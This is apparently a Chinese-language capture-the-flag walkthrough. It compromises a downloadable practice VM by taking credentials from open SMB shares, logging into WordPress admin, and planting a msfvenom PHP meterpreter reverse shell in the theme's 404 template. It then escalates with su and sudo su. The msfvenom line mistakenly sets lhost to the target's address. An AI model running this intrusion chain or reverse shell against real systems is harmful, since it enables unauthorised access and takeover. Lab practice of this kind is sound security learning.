SMB信息泄露提权

准备工作

镜像下载地址：
链接：https://pan.baidu.com/s/1eKjpvhczXESM1K7mqDv6Tw
提取码：bxps

漏洞复现过程

1. 使用netdiscover发现存活主机

netdidscover -i eth0

2. 使用nmap扫描主机

• 发现目标主机开放了远程连接端口和smb、mysql服务端口
  

3. 尝试登陆smb服务收集敏感信息，空指令登陆
   

• 访问共享目录，一步步地收集敏感信息

smbclient '\\192.168.75.153\print$'
smbclient '\\192.168.75.153\share$'
smbclient '\\192.168.75.153\IPC$'

• 登陆的密码全部为空
  
• 可以看到，IPC共享目录虽然能访问，但是用户没有权限读取里面的文件
• 然后登陆share目录后，发现了大量的信息

4. 实战中可以逐个查看各个文件的信息，其中这里隐藏信息的文件有deets.txt和wordpress里的wp-config.php文件，使用get命令下载对应的文件

cd wordpress
get wp-config.php
get deets.txt

• 文件会下载到相应的目录中，wp-config.php中查看到mysql的用户名和密码，在deets.txt中查看到一个不知名的密码(记住，后面登录提权有用)
  
  

5. 尝试使用该用户名和密码登录mysql，登录失败

• 目标主机不允许登录mysql服务
  

6. 发现完敏感信息，我们再使用dirb深入挖掘子目录

dirb http://192.168.75.153

• 因为mysql不能登录，所以放弃尝试phpmyadmin
• 碰巧发现了后台登录的网址，尝试使用mysql的用户名和密码进行登录
  
• 登录成功
  

7. 进入Appearance目录的editor目录，使用msfvenom命令生成一个shellcode文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.75.153 lport=4444 -f raw

• 参数说明：-p是利用的漏洞模块，lhost是本机地址，lport是本机开放侦听的端口号，-f是输出的文件格式
  
• 进入editor目录，更改404Template文件中的内容，点击update file
  

8. 打开msfconsole，加载漏洞模块，反弹webshell

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 本机ip
run

• 当运行404页面时，shell实现反弹
  

9. 查看/etc/passwd文件，发现有一个togie用户在home用户组
   

10. 尝试切换到该用户，并键入之前的12345密码
    

11. 查看sudo能执行那些操作
    

12. 使用sudo su提权成功，查看flag值